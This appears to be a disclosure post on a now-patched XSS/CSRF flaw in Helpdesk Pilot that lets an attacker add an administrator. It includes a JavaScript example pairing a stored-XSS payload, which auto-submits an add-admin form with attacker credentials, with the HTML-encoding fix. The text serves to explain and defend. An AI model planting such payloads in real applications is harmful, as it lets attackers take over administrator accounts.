Helpdesk Pilot XSS/CSRF: Add an Admin
This bug allows a malicious party to add themselves as a Helpdesk Pilot administrator via a crafted XSS/CSRF combination. It affects all versions of the Helpdesk Pilot software. I have received confirmation from the developers that this bug has been patched in the latest version of the software. There is a video demonstration of this attack below.
For the more malicious demonstration shown in the video, an administrator could be added using a URL of the following form:
This submits a form that adds an administrator, assuming the person viewing the ticket has administrator permissions. Because the injected script runs inside the administrator's authenticated page, the browser attaches their session to the request, so the application cannot tell it apart from a genuine admin action.
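The following is an added illustration of the mechanism described above, not Helpdesk Pilot's code and not the payload from the video. It shows how a ticket field rendered without encoding turns a stored XSS string into a self-submitting form (the CSRF half of the chain), and the HTML output encoding that neutralises it. The endpoint `/admin/users/add`, the field names and the values are all hypothetical.

```javascript
// Added example (not Helpdesk Pilot's code): a stored XSS payload in a ticket
// field that becomes a CSRF request when an administrator views the ticket,
// beside the output encoding that stops it.
// The endpoint, field names and values below are hypothetical.

// Constructed payload an attacker would place in a ticket subject. If the
// subject is rendered unencoded, the script builds a form aimed at the
// (hypothetical) add-admin endpoint and submits it from the admin's own page,
// so the request carries the admin's session and passes any same-origin check.
const ADD_ADMIN_PAYLOAD =
  '<script>' +
  'var f=document.createElement("form");' +
  'f.method="POST";f.action="/admin/users/add";' + // hypothetical endpoint
  '[["username","attacker"],["password","Passw0rd!"],["role","administrator"]]' +
  '.forEach(function(p){var i=document.createElement("input");' +
  'i.name=p[0];i.value=p[1];f.appendChild(i);});' +
  'document.body.appendChild(f);f.submit();' +
  '</script>';

// Vulnerable rendering: the ticket subject is concatenated straight into HTML,
// so the browser parses the payload as a live <script> element.
function renderTicketUnsafe(subject) {
  return '<h2 class="ticket-subject">' + subject + '</h2>';
}

// Minimal HTML entity encoding for text placed in element content. Ampersand
// is replaced first so the entities produced afterwards are not re-encoded;
// quotes are covered too, which also protects attribute contexts.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened rendering: same markup, but the subject is encoded first, so the
// payload is displayed as text and never executes.
function renderTicketSafe(subject) {
  return '<h2 class="ticket-subject">' + escapeHtml(subject) + '</h2>';
}

// Crude check used only to show the difference between the two renderings:
// does the produced HTML still contain an opening script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe render contains live <script>:', containsScriptTag(renderTicketUnsafe(ADD_ADMIN_PAYLOAD)));
console.log('safe render contains live <script>:  ', containsScriptTag(renderTicketSafe(ADD_ADMIN_PAYLOAD)));
```

Note that a per-session anti-CSRF token on the add-admin form would not by itself close this hole: script injected through XSS runs in the same origin and can read the token out of the page before submitting. Encoding ticket fields on output (or an equivalent fix by the vendor) is what removes the XSS, and with it the CSRF.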